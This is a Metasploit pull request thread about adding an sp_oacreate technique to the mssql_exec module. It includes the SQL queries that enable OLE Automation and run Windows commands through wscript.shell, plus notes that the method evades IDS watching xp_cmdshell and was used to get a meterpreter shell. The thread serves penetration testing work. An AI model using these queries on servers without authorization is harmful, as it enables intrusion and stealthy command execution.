add mssql_exec_oacreate module

[FLX-0x00]

Added mssql_exec_oacreate module which will execute a Windows command on a MSSQL/MSDE instance via the sp_oacreate procedure (ole) instead of the xp_cmdshell.

Used in:

metasploit-framework/lib/msf/core/exploit/remote/mssql_commands.rb

Line 33 in 85a9acc

def mssql_rebuild_xpcmdshell(opts={})

Reference: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use admin/mssql/mssql_exec_oacreate
• set correct rhost, username and password for the mssql instance
• run

[label-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[gwillcox-r7]

@blacklist-arcc Any update on writing documentation for this module? We may have to attic this pull request if no documentation file is included with it.

[FLX-0x00]

Oh sorry, completely was off my focus. I will cover the documentation in the next business days. Thanks for the kindly reminder

[bcoles]

Will this work if the command CMD contains apostrophe characters ' ? They will probably need to be escaped.

[FLX-0x00]

Think this will be not possible in this case. The xp_cmdshell method that is already implemented in metasploit has not solved the problem either.

metasploit-framework/lib/msf/core/exploit/remote/mssql.rb

Line 131 in 1ed4023

res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts)

[label-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[smcintyre-r7]

Does this make sense to implement as a separate module instead of adding it as a technique to the existing auxiliary/admin/mssql/mssql_exec module? The two are incredibly similar, it just looks like an OptEnum specifying the technique could be used, the datastore options should be identical. Note that since this is an auxiliary module, a custom OptEnum would need to be used instead of a Targets definition.

What could make this even better is if the technique could be automatically determined at runtime, allowing the user to focus on the command they want to run and less on how they want to run it.

[FLX-0x00]

I totally agree, the technique was useful in some pentest situations where xp_cmdshell is not available or monitored by some fancy IDS. I will take a look and try to add another commit extending the "original" module.

[FLX-0x00]

@smcintyre-r7 I reverted my changes and follow your advice and modyfied the original module. Now a technique can be set to use the sp_oacreate function instead. I tested agains my own lab and a few hackthebox machines that runs mssql - both methods working smooth. As CMD I used the output of the web_delivery module to get a long powershell command that provide a meterpreter shell as a result.

If the xp_cmdshell function fails the sp_oacreate is invoked as a more failsafe method. I added some small hints in the description that no temp data table is created in order to view any output. So the method is again more opsec safe but did not provide any output.

[smcintyre-r7]

This works for me, I was able to verify that it's running the command correctly.

msf6 auxiliary(admin/mssql/mssql_exec) > set CMD "cmd.exe /c ping 192.168.159.128"
CMD => cmd.exe /c ping 192.168.159.128
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.159.46

[*] 192.168.159.46:52454 - Enable advanced options and ole automation procedures
[*] 192.168.159.46:52454 - SQL Query: EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
[*] 192.168.159.46:52454 - SQL Query: EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
[+] 192.168.159.46:52454 - Executing command using sp_oacreate. No output will be displayed.
[*] 192.168.159.46:52454 - SQL Query: DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, 'cmd.exe /c ping 192.168.159.128';



 Column1
 -------
 0

[*] Auxiliary module execution completed
msf6 auxiliary(admin/mssql/mssql_exec) >

I made some tweaks to some of the verbiages and updated the docs to describe the techniques. I'll go ahead and land this now, thanks for this contribution!

[smcintyre-r7]

Release Notes

Updated the auxiliary/admin/mssql/mssql_exec module to add the sp_oacreate technique, which is a more stealthy alternative to the traditional xp_cmdshell stored procedure.